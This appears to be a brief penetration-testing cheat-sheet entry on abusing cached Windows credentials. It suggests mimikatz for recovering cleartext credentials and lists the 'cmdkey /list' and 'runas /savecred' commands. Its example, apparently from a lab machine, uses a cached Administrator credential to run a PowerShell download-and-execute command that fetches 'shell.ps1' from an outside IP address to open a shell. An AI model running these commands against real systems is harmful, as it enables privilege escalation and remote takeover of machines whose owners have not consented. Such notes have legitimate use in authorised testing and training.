Cached Credentials¶

Use mimikatz to discover cleartext version of cached credentials

Check for cached credentials

cmdkey /list

Run command under context of a cached credential

runas /user:<user> /savecred "<command>"

Example

cmdkey /list

Currently stored credentials:

Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator

runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.77/shell.ps1')"